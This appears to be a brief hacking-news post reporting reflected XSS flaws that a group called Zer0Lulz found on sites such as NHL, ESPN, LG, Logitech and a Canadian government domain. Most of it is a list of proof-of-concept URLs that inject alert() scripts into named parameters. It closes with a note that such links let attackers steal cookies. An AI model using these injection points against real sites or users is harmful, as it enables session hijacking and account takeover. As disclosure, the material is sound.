The Web-Hacking group Zer0Lulz has discovered Reflected XSS vulnerabilities in lot of high profile sites, including LG,Logitech,Darkreading. Hackers named their operation as "#OP XSSec"
Vulnerable sites and Poc:
http://www.nhl.com/ice/search?q=";alert("XSS");"
http://espn.go.com/espn/page2/index?id="><script>alert("XSS")</script>
http://www.food.com/recipes.php?chef="><script>alert("XSS")</script>
http://www.logitech.com/en-au/footer/terms-of-use/&id="><script>alert("XSS")</script>
http://www.darkreading.com/search/index?queryText="><script>alert("XSS")</script>
http://www.law.com/jsp/nj/PubArticleNJ.jsp?id="><script>alert("XSS")</script>
http://www.theweathernetwork.com/index.php?product=</script><script>alert("XSS")</script>
http://ryanseacrest.com/search/?q="><script>alert(/XSS/)</script>
http://common.at40.com/static/subway_polls/poll_frame.php?poll_id="></script><script>alert("XSS")</script>
http://www.lg.com/ca_en/common/search/controller.jsp?N=8110&Ntk=All&Ntt=<img src="XSS" onerror=alert("XSS");>&Nty=1&D=Lulz&Ntx=mode+matchallpartial&Dx=mode+matchallpartial&srchLocalCode=ca_en&search_businessType=0&sid=1350DDC94D47
http://www.canada.gc.ca/cgi-bin/termium/autonomyTermium.pl?LULZ&"><script>alert("XSS")</script>
Social Engineering Attack:
Using this Reflected XSS vulnerability, an attacker can steal cookies from victim. As these sites are trusted one, users won't hesitate to click the link(injected with xss). It will results in their account hacked.
